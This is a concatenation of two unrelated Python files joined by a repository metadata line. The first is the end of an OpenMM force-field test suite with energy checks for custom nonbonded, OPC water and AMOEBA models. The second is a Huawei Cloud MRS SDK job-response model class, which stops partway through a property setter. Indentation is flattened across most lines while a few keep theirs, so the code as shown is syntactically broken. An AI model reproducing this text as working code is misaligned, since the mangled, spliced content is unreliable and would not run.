self.assertAlmostEqual(1919.6846822348361, sum(list(energies.values())), 3)
def test_CustomNonbondedGenerator(self):
""" Test the CustomNonbondedForce generator"""
pdb = PDBFile('systems/ions.pdb')
xml = """
<ForceField>
<AtomTypes>
<Type name="SOD" class="SOD" element="Na" mass="22.98977"/>
<Type name="CLA" class="CLA" element="Cl" mass="35.45"/>
</AtomTypes>
<Residues>
<Residue name="CLA">
<Atom name="CLA" type="CLA"/>
</Residue>
<Residue name="SOD">
<Atom name="SOD" type="SOD"/>
</Residue>
</Residues>
<CustomNonbondedForce energy="scale*epsilon*((sigma/r)^12-(sigma/r)^6); sigma=halfSig1+halfSig2; epsilon=rootEps1*rootEps2" bondCutoff="3">
<GlobalParameter name="scale" defaultValue="4"/>
<PerParticleParameter name="sigma"/>
<PerParticleParameter name="epsilon"/>
<ComputedValue name="halfSig" expression="0.5*sigma"/>
<ComputedValue name="rootEps" expression="sqrt(epsilon)"/>
<Atom type="CLA" sigma="0.404468018036" epsilon="0.6276"/>
<Atom type="SOD" sigma="0.251367073323" epsilon="0.1962296"/>
</CustomNonbondedForce>
</ForceField> """
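        # The ComputedValue tags implement Lorentz-Berthelot combining
        # (sigma = halfSig1 + halfSig2, epsilon = rootEps1 * rootEps2), and
        # scale=4 restores the standard 4*epsilon LJ prefactor, so the energy
        # should match a plain NonbondedForce exactly.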
ff = ForceField(StringIO(xml))
system = ff.createSystem(pdb.topology)
context = Context(system, VerletIntegrator(2*femtoseconds), Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energy1 = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
# See if it matches an equivalent NonbondedForce.
system = System()
system.addParticle(1.0)
system.addParticle(1.0)
f = NonbondedForce()
f.addParticle(0, 0.404468018036, 0.6276)
f.addParticle(0, 0.251367073323, 0.1962296)
system.addForce(f)
context = Context(system, VerletIntegrator(2*femtoseconds), Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energy2 = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
self.assertAlmostEqual(energy1, energy2)
    def test_OpcEnergy(self):
        """Test the OPC 4-point water model against an energy computed with Amber."""
pdb = PDBFile('systems/opcbox.pdb')
topology, positions = pdb.topology, pdb.positions
self.assertEqual(len(positions), 864)
forcefield = ForceField('opc.xml')
system = forcefield.createSystem(
topology,
nonbondedMethod=PME,
nonbondedCutoff=0.7*nanometer,
constraints=HBonds,
rigidWater=True,
)
integrator = LangevinIntegrator(300*kelvin, 2.0/picoseconds, 2.0*femtoseconds)
simulation = Simulation(topology, system, integrator)
context = simulation.context
context.setPositions(positions)
# Compare to values computed with Amber (sander).
energy_amber = -2647.6233 # kcal/mol
energy_tolerance = 1.0
state = context.getState(getEnergy=True)
energy1 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2647.2222697324237
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
context.applyConstraints(1e-12)
state = context.getState(getEnergy=True)
energy2 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2647.441600693312
        self.assertTrue(abs(energy2 - energy_amber) < energy_tolerance)
self.assertTrue(abs(energy1 - energy2) < energy_tolerance)
    def test_Opc3Energy(self):
        """Test the OPC3 3-point water model against an energy computed with Amber."""
pdb = PDBFile('systems/opc3box.pdb')
topology, positions = pdb.topology, pdb.positions
self.assertEqual(len(positions), 648)
forcefield = ForceField('opc3.xml')
system = forcefield.createSystem(
topology,
nonbondedMethod=PME,
nonbondedCutoff=0.7*nanometer,
constraints=HBonds,
rigidWater=True,
)
integrator = LangevinIntegrator(300*kelvin, 2.0/picoseconds, 2.0*femtoseconds)
simulation = Simulation(topology, system, integrator)
context = simulation.context
context.setPositions(positions)
# Compare to values computed with Amber (sander).
energy_amber = -2532.1414 # kcal/mol
energy_tolerance = 1.0
state = context.getState(getEnergy=True)
energy1 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2532.4862082354407
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
context.applyConstraints(1e-12)
state = context.getState(getEnergy=True)
energy2 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
        self.assertTrue(abs(energy2 - energy_amber) < energy_tolerance)
self.assertTrue(abs(energy1 - energy2) < energy_tolerance)
class AmoebaTestForceField(unittest.TestCase):
"""Test the ForceField.createSystem() method with the AMOEBA forcefield."""
def setUp(self):
"""Set up the tests by loading the input pdb files and force field
xml files.
"""
self.pdb1 = PDBFile('systems/amoeba-ion-in-water.pdb')
self.forcefield1 = ForceField('amoeba2013.xml')
self.topology1 = self.pdb1.topology
def test_NonbondedMethod(self):
"""Test both options for the nonbondedMethod parameter."""
methodMap = {NoCutoff:AmoebaMultipoleForce.NoCutoff,
PME:AmoebaMultipoleForce.PME}
for method in methodMap:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method)
forces = system.getForces()
self.assertTrue(any(isinstance(f, AmoebaMultipoleForce) and
f.getNonbondedMethod()==methodMap[method]
for f in forces))
def test_Cutoff(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
cutoff_distance = 0.7*nanometer
for method in [NoCutoff, PME]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method,
nonbondedCutoff=cutoff_distance,
constraints=None)
for force in system.getForces():
if isinstance(force, AmoebaVdwForce):
self.assertEqual(force.getCutoff(), cutoff_distance)
if isinstance(force, AmoebaMultipoleForce):
self.assertEqual(force.getCutoffDistance(), cutoff_distance)
def test_DispersionCorrection(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
for useDispersionCorrection in [True, False]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=PME,
useDispersionCorrection=useDispersionCorrection)
for force in system.getForces():
if isinstance(force, AmoebaVdwForce):
self.assertEqual(useDispersionCorrection, force.getUseDispersionCorrection())
def test_RigidWater(self):
"""Test that AMOEBA creates rigid water with the correct geometry."""
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=True)
constraints = dict()
for i in range(system.getNumConstraints()):
p1,p2,dist = system.getConstraintParameters(i)
if p1 < 3:
constraints[(min(p1,p2), max(p1,p2))] = dist.value_in_unit(nanometers)
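        # Expected geometry (a short derivation, not in the original file):
        # the H-H constraint distance follows from the law of cosines,
        # d_HH^2 = 2*d_OH^2 - 2*d_OH^2*cos(theta_HOH).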
hoDist = 0.09572
hohAngle = 108.50*math.pi/180.0
hohDist = math.sqrt(2*hoDist**2 - 2*hoDist**2*math.cos(hohAngle))
self.assertAlmostEqual(constraints[(0,1)], hoDist)
self.assertAlmostEqual(constraints[(0,2)], hoDist)
self.assertAlmostEqual(constraints[(1,2)], hohDist)
# Check that all values of rigidWater are interpreted correctly.
numWaters = 215
self.assertEqual(3*numWaters, system.getNumConstraints())
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=False)
self.assertEqual(0, system.getNumConstraints())
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=None)
self.assertEqual(0, system.getNumConstraints())
def test_Forces(self):
"""Compute forces and compare them to ones generated with a previous version of OpenMM to ensure they haven't changed."""
pdb = PDBFile('systems/alanine-dipeptide-implicit.pdb')
forcefield = ForceField('amoeba2013.xml', 'amoeba2013_gk.xml')
system = forcefield.createSystem(pdb.topology, polarization='direct')
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
state1 = context.getState(getForces=True)
with open('systems/alanine-dipeptide-amoeba-forces.xml') as input:
state2 = XmlSerializer.deserialize(input.read())
        for f1, f2 in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
self.assertTrue(diff < 0.1 or diff/norm(f1) < 1e-3)
def computeAmoeba18Energies(self, filename):
pdb = PDBFile(filename)
forcefield = ForceField('amoeba2018.xml')
system = forcefield.createSystem(pdb.topology, polarization='mutual', mutualInducedTargetEpsilon=1e-5)
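        # Assign each force to its own group so per-force energies can be queried individually.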
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energies = {}
for i, f in enumerate(system.getForces()):
state = context.getState(getEnergy=True, groups={i})
energies[f.getName()] = state.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
return energies
def test_Amoeba18BPTI(self):
"""Test that AMOEBA18 computes energies correctly for BPTI."""
energies = self.computeAmoeba18Energies('systems/bpti.pdb')
# Compare to values computed with Tinker.
self.assertAlmostEqual(290.2445, energies['AmoebaBond'], 4)
self.assertAlmostEqual(496.4300, energies['AmoebaAngle']+energies['AmoebaInPlaneAngle'], 4)
self.assertAlmostEqual(51.2913, energies['AmoebaOutOfPlaneBend'], 4)
self.assertAlmostEqual(5.7695, energies['AmoebaStretchBend'], 4)
self.assertAlmostEqual(75.6890, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(19.3364, energies['AmoebaPiTorsion'], 4)
self.assertAlmostEqual(-32.6689, energies['AmoebaTorsionTorsionForce'], 4)
self.assertAlmostEqual(383.8705, energies['AmoebaVdwForce'], 4)
self.assertAlmostEqual(-1323.5640-225.3660, energies['AmoebaMultipoleForce'], 2)
self.assertAlmostEqual(-258.9676, sum(list(energies.values())), 2)
def test_Amoeba18Nucleic(self):
"""Test that AMOEBA18 computes energies correctly for DNA and RNA."""
energies = self.computeAmoeba18Energies('systems/nucleic.pdb')
# Compare to values computed with Tinker.
self.assertAlmostEqual(749.6953, energies['AmoebaBond'], 4)
self.assertAlmostEqual(579.9971, energies['AmoebaAngle']+energies['AmoebaInPlaneAngle'], 4)
self.assertAlmostEqual(10.6630, energies['AmoebaOutOfPlaneBend'], 4)
self.assertAlmostEqual(5.2225, energies['AmoebaStretchBend'], 4)
self.assertAlmostEqual(166.7233, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(57.2066, energies['AmoebaPiTorsion'], 4)
self.assertAlmostEqual(-4.2538, energies['AmoebaStretchTorsion'], 4)
self.assertAlmostEqual(-5.0402, energies['AmoebaAngleTorsion'], 4)
self.assertAlmostEqual(187.1103, energies['AmoebaVdwForce'], 4)
self.assertAlmostEqual(1635.1289-236.1484, energies['AmoebaMultipoleForce'], 3)
self.assertAlmostEqual(3146.3046, sum(list(energies.values())), 3)
if __name__ == '__main__':
unittest.main()
|
17d7b86ac22cb6eb9b4a24d5ad12158a7ebe3841
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-mrs/huaweicloudsdkmrs/v1/model/create_and_execute_job_response.py
|
49ffa381de5a40a509e38025d30f0b1053035f14
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 48,564
|
py
|
create_and_execute_job_response.py
|
# coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreateAndExecuteJobResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'templated': 'bool',
'created_at': 'int',
'updated_at': 'int',
'id': 'str',
'tenant_id': 'str',
'job_id': 'str',
'job_name': 'str',
'input_id': 'str',
'output_id': 'str',
'start_time': 'int',
'end_time': 'int',
'cluster_id': 'str',
'engine_job_id': 'str',
'return_code': 'str',
'is_public': 'bool',
'is_protected': 'bool',
'group_id': 'str',
'jar_path': 'str',
'input': 'str',
'output': 'str',
'job_log': 'str',
'job_type': 'int',
'file_action': 'str',
'arguments': 'str',
'hql': 'str',
'job_state': 'int',
'job_final_status': 'int',
'hive_script_path': 'str',
'create_by': 'str',
'finished_step': 'int',
'job_main_id': 'str',
'job_step_id': 'str',
'postpone_at': 'int',
'step_name': 'str',
'step_num': 'int',
'task_num': 'int',
'update_by': 'str',
'credentials': 'str',
'user_id': 'str',
'job_configs': 'dict(str, object)',
'extra': 'dict(str, object)',
'data_source_urls': 'dict(str, object)',
'info': 'dict(str, object)'
}
attribute_map = {
'templated': 'templated',
'created_at': 'created_at',
'updated_at': 'updated_at',
'id': 'id',
'tenant_id': 'tenant_id',
'job_id': 'job_id',
'job_name': 'job_name',
'input_id': 'input_id',
'output_id': 'output_id',
'start_time': 'start_time',
'end_time': 'end_time',
'cluster_id': 'cluster_id',
'engine_job_id': 'engine_job_id',
'return_code': 'return_code',
'is_public': 'is_public',
'is_protected': 'is_protected',
'group_id': 'group_id',
'jar_path': 'jar_path',
'input': 'input',
'output': 'output',
'job_log': 'job_log',
'job_type': 'job_type',
'file_action': 'file_action',
'arguments': 'arguments',
'hql': 'hql',
'job_state': 'job_state',
'job_final_status': 'job_final_status',
'hive_script_path': 'hive_script_path',
'create_by': 'create_by',
'finished_step': 'finished_step',
'job_main_id': 'job_main_id',
'job_step_id': 'job_step_id',
'postpone_at': 'postpone_at',
'step_name': 'step_name',
'step_num': 'step_num',
'task_num': 'task_num',
'update_by': 'update_by',
'credentials': 'credentials',
'user_id': 'user_id',
'job_configs': 'job_configs',
'extra': 'extra',
'data_source_urls': 'data_source_urls',
'info': 'info'
}
def __init__(self, templated=None, created_at=None, updated_at=None, id=None, tenant_id=None, job_id=None, job_name=None, input_id=None, output_id=None, start_time=None, end_time=None, cluster_id=None, engine_job_id=None, return_code=None, is_public=None, is_protected=None, group_id=None, jar_path=None, input=None, output=None, job_log=None, job_type=None, file_action=None, arguments=None, hql=None, job_state=None, job_final_status=None, hive_script_path=None, create_by=None, finished_step=None, job_main_id=None, job_step_id=None, postpone_at=None, step_name=None, step_num=None, task_num=None, update_by=None, credentials=None, user_id=None, job_configs=None, extra=None, data_source_urls=None, info=None):
"""CreateAndExecuteJobResponse
The model defined in huaweicloud sdk
        :param templated: Whether the job execution object was generated from a job template.
        :type templated: bool
        :param created_at: Job creation time, as a 10-digit timestamp.
        :type created_at: int
        :param updated_at: Job update time, as a 10-digit timestamp.
        :type updated_at: int
        :param id: Job ID.
        :type id: str
        :param tenant_id: Project ID. For how to obtain it, see [Obtaining a Project ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html).
        :type tenant_id: str
        :param job_id: Job application ID.
        :type job_id: str
        :param job_name: Job name, consisting only of letters, digits, hyphens, and underscores, 1 to 64 characters long. Note: different jobs may share the same name, but this is not recommended.
        :type job_name: str
        :param input_id: Data input ID.
        :type input_id: str
        :param output_id: Data output ID.
        :type output_id: str
        :param start_time: Job execution start time, as a 10-digit timestamp.
        :type start_time: int
        :param end_time: Job execution end time, as a 10-digit timestamp.
        :type end_time: int
        :param cluster_id: Cluster ID.
        :type cluster_id: str
        :param engine_job_id: Oozie workflow ID.
        :type engine_job_id: str
        :param return_code: Return code of the execution result.
        :type return_code: str
        :param is_public: Whether the job is public. Not supported in the current version.
        :type is_public: bool
        :param is_protected: Whether the job is protected. Not supported in the current version.
        :type is_protected: bool
        :param group_id: Job execution group ID.
        :type group_id: str
        :param jar_path: Path of the executable JAR file or SQL file, which must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Spark Script files must end with ".sql"; MapReduce and Spark JAR files must end with ".jar"; sql and jar are case-insensitive.
        :type jar_path: str
        :param input: Data input path, which must start with "/" or "s3a://". Configure a valid OBS path; OBS paths do not support KMS-encrypted files or programs. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
        :type input: str
        :param output: Data output path, which must start with "/" or "s3a://". Configure a valid OBS path; if the path does not exist, the system creates it automatically. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
        :type output: str
        :param job_log: Path for storing job logs that record the job's running status. Must start with "/" or "s3a://"; configure a valid OBS path. At most 1023 characters, must not contain the special characters ;|&>'<$, and may be empty.
        :type job_log: str
        :param job_type: Job type code. - 1: MapReduce - 2: Spark - 3: Hive Script - 4: HiveSQL (currently not supported) - 5: DistCp, for importing and exporting data - 6: Spark Script - 7: Spark SQL, for submitting SQL statements (currently not supported by this API) Note: only clusters that include the Spark and Hive components can create Spark and Hive jobs.
        :type job_type: int
        :param file_action: File operation type. Options: - export: export data from HDFS to OBS - import: import data from OBS to HDFS
        :type file_action: str
        :param arguments: Key parameters for program execution, specified by functions inside the user program; MRS only passes them through. At most 150000 characters, must not contain the special characters ;|&>'<$!\\\"\\, and may be empty. Note: when a parameter contains sensitive information (such as a login password), prefix the parameter name with "@" to encrypt its value and keep it from being persisted in plain text. When job information is viewed, sensitive values are shown as "*". Example: username=admin @password=admin_123
        :type arguments: str
        :param hql: Hive & Spark SQL statement.
        :type hql: str
        :param job_state: Job status code. - 1: Terminated - 2: Starting - 3: Running - 4: Completed - 5: Abnormal - 6: Error
        :type job_state: int
        :param job_final_status: Final job status code. - 0: unfinished - 1: execution error, terminated - 2: completed successfully - 3: canceled
        :type job_final_status: int
        :param hive_script_path: Path of the SQL program, required only for Spark Script and Hive Script jobs. It must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Must end with ".sql"; sql is case-insensitive.
        :type hive_script_path: str
        :param create_by: ID of the user who created the job. Retained for compatibility with earlier versions.
        :type create_by: str
        :param finished_step: Number of steps completed so far. Retained for compatibility with earlier versions.
        :type finished_step: int
        :param job_main_id: Main job ID. Retained for compatibility with earlier versions.
        :type job_main_id: str
        :param job_step_id: Job step ID. Retained for compatibility with earlier versions.
        :type job_step_id: str
        :param postpone_at: Delay time, as a 10-digit timestamp. Retained for compatibility with earlier versions.
        :type postpone_at: int
        :param step_name: Job step name. Retained for compatibility with earlier versions.
        :type step_name: str
        :param step_num: Number of steps. Retained for compatibility with earlier versions.
        :type step_num: int
        :param task_num: Number of tasks. Retained for compatibility with earlier versions.
        :type task_num: int
        :param update_by: ID of the user who updated the job.
        :type update_by: str
        :param credentials: Token. Not supported in the current version.
        :type credentials: str
        :param user_id: ID of the user who created the job. Kept for compatibility with earlier versions; no longer used.
        :type user_id: str
        :param job_configs: Key-value pairs holding the job's runtime configuration.
        :type job_configs: dict(str, object)
        :param extra: Authentication information. Not supported in the current version.
        :type extra: dict(str, object)
        :param data_source_urls: Data source URLs.
        :type data_source_urls: dict(str, object)
        :param info: Key-value pairs containing job runtime information returned by Oozie.
        :type info: dict(str, object)
"""
super(CreateAndExecuteJobResponse, self).__init__()
self._templated = None
self._created_at = None
self._updated_at = None
self._id = None
self._tenant_id = None
self._job_id = None
self._job_name = None
self._input_id = None
self._output_id = None
self._start_time = None
self._end_time = None
self._cluster_id = None
self._engine_job_id = None
self._return_code = None
self._is_public = None
self._is_protected = None
self._group_id = None
self._jar_path = None
self._input = None
self._output = None
self._job_log = None
self._job_type = None
self._file_action = None
self._arguments = None
self._hql = None
self._job_state = None
self._job_final_status = None
self._hive_script_path = None
self._create_by = None
self._finished_step = None
self._job_main_id = None
self._job_step_id = None
self._postpone_at = None
self._step_name = None
self._step_num = None
self._task_num = None
self._update_by = None
self._credentials = None
self._user_id = None
self._job_configs = None
self._extra = None
self._data_source_urls = None
self._info = None
self.discriminator = None
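        # Only assign attributes that were explicitly provided; the rest stay None.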
if templated is not None:
self.templated = templated
if created_at is not None:
self.created_at = created_at
if updated_at is not None:
self.updated_at = updated_at
if id is not None:
self.id = id
if tenant_id is not None:
self.tenant_id = tenant_id
if job_id is not None:
self.job_id = job_id
if job_name is not None:
self.job_name = job_name
if input_id is not None:
self.input_id = input_id
if output_id is not None:
self.output_id = output_id
if start_time is not None:
self.start_time = start_time
if end_time is not None:
self.end_time = end_time
if cluster_id is not None:
self.cluster_id = cluster_id
if engine_job_id is not None:
self.engine_job_id = engine_job_id
if return_code is not None:
self.return_code = return_code
if is_public is not None:
self.is_public = is_public
if is_protected is not None:
self.is_protected = is_protected
if group_id is not None:
self.group_id = group_id
if jar_path is not None:
self.jar_path = jar_path
if input is not None:
self.input = input
if output is not None:
self.output = output
if job_log is not None:
self.job_log = job_log
if job_type is not None:
self.job_type = job_type
if file_action is not None:
self.file_action = file_action
if arguments is not None:
self.arguments = arguments
if hql is not None:
self.hql = hql
if job_state is not None:
self.job_state = job_state
if job_final_status is not None:
self.job_final_status = job_final_status
if hive_script_path is not None:
self.hive_script_path = hive_script_path
if create_by is not None:
self.create_by = create_by
if finished_step is not None:
self.finished_step = finished_step
if job_main_id is not None:
self.job_main_id = job_main_id
if job_step_id is not None:
self.job_step_id = job_step_id
if postpone_at is not None:
self.postpone_at = postpone_at
if step_name is not None:
self.step_name = step_name
if step_num is not None:
self.step_num = step_num
if task_num is not None:
self.task_num = task_num
if update_by is not None:
self.update_by = update_by
if credentials is not None:
self.credentials = credentials
if user_id is not None:
self.user_id = user_id
if job_configs is not None:
self.job_configs = job_configs
if extra is not None:
self.extra = extra
if data_source_urls is not None:
self.data_source_urls = data_source_urls
if info is not None:
self.info = info
@property
def templated(self):
"""Gets the templated of this CreateAndExecuteJobResponse.
        Whether the job execution object was generated from a job template.
:return: The templated of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._templated
@templated.setter
def templated(self, templated):
"""Sets the templated of this CreateAndExecuteJobResponse.
        Whether the job execution object was generated from a job template.
:param templated: The templated of this CreateAndExecuteJobResponse.
:type templated: bool
"""
self._templated = templated
@property
def created_at(self):
"""Gets the created_at of this CreateAndExecuteJobResponse.
        Job creation time, as a 10-digit timestamp.
:return: The created_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this CreateAndExecuteJobResponse.
        Job creation time, as a 10-digit timestamp.
:param created_at: The created_at of this CreateAndExecuteJobResponse.
:type created_at: int
"""
self._created_at = created_at
@property
def updated_at(self):
"""Gets the updated_at of this CreateAndExecuteJobResponse.
        Job update time, as a 10-digit timestamp.
:return: The updated_at of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._updated_at
@updated_at.setter
def updated_at(self, updated_at):
"""Sets the updated_at of this CreateAndExecuteJobResponse.
        Job update time, as a 10-digit timestamp.
:param updated_at: The updated_at of this CreateAndExecuteJobResponse.
:type updated_at: int
"""
self._updated_at = updated_at
@property
def id(self):
"""Gets the id of this CreateAndExecuteJobResponse.
        Job ID.
:return: The id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this CreateAndExecuteJobResponse.
        Job ID.
:param id: The id of this CreateAndExecuteJobResponse.
:type id: str
"""
self._id = id
@property
def tenant_id(self):
"""Gets the tenant_id of this CreateAndExecuteJobResponse.
        Project ID. For how to obtain it, see [Obtaining a Project ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html).
:return: The tenant_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._tenant_id
@tenant_id.setter
def tenant_id(self, tenant_id):
"""Sets the tenant_id of this CreateAndExecuteJobResponse.
        Project ID. For how to obtain it, see [Obtaining a Project ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html).
:param tenant_id: The tenant_id of this CreateAndExecuteJobResponse.
:type tenant_id: str
"""
self._tenant_id = tenant_id
@property
def job_id(self):
"""Gets the job_id of this CreateAndExecuteJobResponse.
        Job application ID.
:return: The job_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this CreateAndExecuteJobResponse.
        Job application ID.
:param job_id: The job_id of this CreateAndExecuteJobResponse.
:type job_id: str
"""
self._job_id = job_id
@property
def job_name(self):
"""Gets the job_name of this CreateAndExecuteJobResponse.
        Job name, consisting only of letters, digits, hyphens, and underscores, 1 to 64 characters long. Note: different jobs may share the same name, but this is not recommended.
:return: The job_name of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._job_name
@job_name.setter
def job_name(self, job_name):
"""Sets the job_name of this CreateAndExecuteJobResponse.
        Job name, consisting only of letters, digits, hyphens, and underscores, 1 to 64 characters long. Note: different jobs may share the same name, but this is not recommended.
:param job_name: The job_name of this CreateAndExecuteJobResponse.
:type job_name: str
"""
self._job_name = job_name
@property
def input_id(self):
"""Gets the input_id of this CreateAndExecuteJobResponse.
        Data input ID.
:return: The input_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._input_id
@input_id.setter
def input_id(self, input_id):
"""Sets the input_id of this CreateAndExecuteJobResponse.
        Data input ID.
:param input_id: The input_id of this CreateAndExecuteJobResponse.
:type input_id: str
"""
self._input_id = input_id
@property
def output_id(self):
"""Gets the output_id of this CreateAndExecuteJobResponse.
        Data output ID.
:return: The output_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._output_id
@output_id.setter
def output_id(self, output_id):
"""Sets the output_id of this CreateAndExecuteJobResponse.
        Data output ID.
:param output_id: The output_id of this CreateAndExecuteJobResponse.
:type output_id: str
"""
self._output_id = output_id
@property
def start_time(self):
"""Gets the start_time of this CreateAndExecuteJobResponse.
        Job execution start time, as a 10-digit timestamp.
:return: The start_time of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._start_time
@start_time.setter
def start_time(self, start_time):
"""Sets the start_time of this CreateAndExecuteJobResponse.
        Job execution start time, as a 10-digit timestamp.
:param start_time: The start_time of this CreateAndExecuteJobResponse.
:type start_time: int
"""
self._start_time = start_time
@property
def end_time(self):
"""Gets the end_time of this CreateAndExecuteJobResponse.
        Job execution end time, as a 10-digit timestamp.
:return: The end_time of this CreateAndExecuteJobResponse.
:rtype: int
"""
return self._end_time
@end_time.setter
def end_time(self, end_time):
"""Sets the end_time of this CreateAndExecuteJobResponse.
        Job execution end time, as a 10-digit timestamp.
:param end_time: The end_time of this CreateAndExecuteJobResponse.
:type end_time: int
"""
self._end_time = end_time
@property
def cluster_id(self):
"""Gets the cluster_id of this CreateAndExecuteJobResponse.
        Cluster ID.
:return: The cluster_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._cluster_id
@cluster_id.setter
def cluster_id(self, cluster_id):
"""Sets the cluster_id of this CreateAndExecuteJobResponse.
        Cluster ID.
:param cluster_id: The cluster_id of this CreateAndExecuteJobResponse.
:type cluster_id: str
"""
self._cluster_id = cluster_id
@property
def engine_job_id(self):
"""Gets the engine_job_id of this CreateAndExecuteJobResponse.
        Oozie workflow ID.
:return: The engine_job_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._engine_job_id
@engine_job_id.setter
def engine_job_id(self, engine_job_id):
"""Sets the engine_job_id of this CreateAndExecuteJobResponse.
        Oozie workflow ID.
:param engine_job_id: The engine_job_id of this CreateAndExecuteJobResponse.
:type engine_job_id: str
"""
self._engine_job_id = engine_job_id
@property
def return_code(self):
"""Gets the return_code of this CreateAndExecuteJobResponse.
        Return code of the execution result.
:return: The return_code of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._return_code
@return_code.setter
def return_code(self, return_code):
"""Sets the return_code of this CreateAndExecuteJobResponse.
        Return code of the execution result.
:param return_code: The return_code of this CreateAndExecuteJobResponse.
:type return_code: str
"""
self._return_code = return_code
@property
def is_public(self):
"""Gets the is_public of this CreateAndExecuteJobResponse.
        Whether the job is public. Not supported in the current version.
:return: The is_public of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._is_public
@is_public.setter
def is_public(self, is_public):
"""Sets the is_public of this CreateAndExecuteJobResponse.
        Whether the job is public. Not supported in the current version.
:param is_public: The is_public of this CreateAndExecuteJobResponse.
:type is_public: bool
"""
self._is_public = is_public
@property
def is_protected(self):
"""Gets the is_protected of this CreateAndExecuteJobResponse.
        Whether the job is protected. Not supported in the current version.
:return: The is_protected of this CreateAndExecuteJobResponse.
:rtype: bool
"""
return self._is_protected
@is_protected.setter
def is_protected(self, is_protected):
"""Sets the is_protected of this CreateAndExecuteJobResponse.
        Whether the job is protected. Not supported in the current version.
:param is_protected: The is_protected of this CreateAndExecuteJobResponse.
:type is_protected: bool
"""
self._is_protected = is_protected
@property
def group_id(self):
"""Gets the group_id of this CreateAndExecuteJobResponse.
        Job execution group ID.
:return: The group_id of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._group_id
@group_id.setter
def group_id(self, group_id):
"""Sets the group_id of this CreateAndExecuteJobResponse.
        Job execution group ID.
:param group_id: The group_id of this CreateAndExecuteJobResponse.
:type group_id: str
"""
self._group_id = group_id
@property
def jar_path(self):
"""Gets the jar_path of this CreateAndExecuteJobResponse.
        Path of the executable JAR file or SQL file, which must meet the following requirements: - At most 1023 characters, must not contain the special characters ;|&><'$, and cannot be empty or all spaces. - Must start with "/" or "s3a://"; OBS paths do not support KMS-encrypted files or programs. - Spark Script files must end with ".sql"; MapReduce and Spark JAR files must end with ".jar"; sql and jar are case-insensitive.
:return: The jar_path of this CreateAndExecuteJobResponse.
:rtype: str
"""
return self._jar_path
@jar_path.setter
def jar_path(self, jar_path):
"""Sets the jar_path of this CreateAndExecuteJobResponse.
